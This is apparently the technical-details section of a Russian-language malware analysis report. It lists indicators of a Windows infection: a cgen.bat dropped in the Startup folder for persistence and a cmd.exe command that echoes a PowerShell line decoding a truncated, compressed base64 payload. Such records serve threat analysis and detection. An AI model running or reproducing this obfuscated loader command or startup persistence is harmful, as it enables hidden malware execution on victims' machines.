Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\cgen.bat:Zone.Identifier
- %HOMEPATH%\Start Menu\Programs\Startup\cgen.bat
- '<SYSTEM32>\cmd.exe' /S /D /c" echo $sVQWw = New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sICMeOCVoC/zE1MT!1NzU4MTUuNjg!tVZtT+M4EP6OxH+wVpGSSGnown44Ia1EKa+3W+i1vHerlZtMWi+OHWyn0Fv47zdOExJUuOXudPnS2p4Z...
- '<SYSTEM32>\cmd.exe' /c ""%HOMEPATH%\start menu\programs\startup\cgen.bat" "
- <SYSTEM32>\cmd.exe
- ClassName: 'EDIT' WindowName: ''